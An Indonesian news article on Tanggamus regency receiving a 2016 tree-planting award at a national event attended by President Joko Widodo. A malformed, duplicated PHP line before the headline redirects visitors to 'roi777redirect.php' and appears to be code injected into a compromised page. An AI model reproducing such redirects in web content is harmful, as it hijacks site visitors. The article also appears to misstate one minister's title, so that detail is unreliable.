header( 'Location: /roi777redirect.php true, 303 );header( 'Location: roi777redirect.php', true, 303 ); Pemkab Tanggamus Terima Penghargaan Terbaik Penanaman Pohon Tahun 2016 -
Pemkab Tanggamus Terima Penghargaan Terbaik Penanaman Pohon Tahun 2016
TRANSLAMPUNG.COM, YOGYAKARTA – Wakil Bupati Tanggamus, Samsul Hadi, mengajak masyarakat untuk terus menjaga dan melestarikan hutan.
Hal tersebut disampaikan Samsul usai menerima penghargaan terbaik penanaman pohon tahun 2016, di kegiatan Hari Menanam Pohon se-Indonesia dan Bulan Menanam Nasional 2017, di Desa Karangasem, Kecamatan Ponjong, Kabupaten Gunung Kidul, Sabtu (9/12).
“‎Terima kasih pada masyarakat Tanggamus yang terus mendukung kegiatan menanam pohon. Dan, kita termasuk bangga atas perestasi yang kita dapat ini,” kata Samsul.
Diketahui, dalam kegiatan tersebut turut hadir, Presiden RI, Joko Widodo, didampingi Menteri Perkebunan, Siti Nurbaya, Gubernur dan Bupati seluruh Indonesia.
Presiden RI, Joko Widodo, menyampaikan sambutannya dalam kegiatan Hari Menanam Pohon se-Indonesia dan Bulan Menanam Pohon Nasional 2017, Sabtu (9/12). (Foto: Dok. Diskominfo Tanggamus)
Mengangkat tema, Makmurkan Rakyat Lestarikan Lingkungan, Presiden Jokowi-sapaan akrabnya, juga menanam sebanyak 4500 batang pohon, yang meliputi, Jati, Akasia dan Jambu.‎
“Pohon yang baru di tanam itu supaya dapat di pelihara masyarakat dengan baik, agar tumbuh segar dan pada waktu nya atau menunggu beberapa tahun supaya bisa ditebang untuk dipergunakan. Kalau buah jambunya bisa di jual,” ujar Jokowi.
“‎Untuk itu saya berharap kepada kita semua agar menjaga dan melestarikanya agar tetap hijau dan sejuk,” tambah Jokowi memungkas.‎
Dalam menghadiri kegiatan ‎Hari Menanam Pohon se-Indonesia dan Bulan Menanam Nasional 2017‎, Wakil Bupati Tanggamus turut di dampingi Asisten II Pemkab setempat, F. B. Karjiono. (cr1/ayp)
News Reporter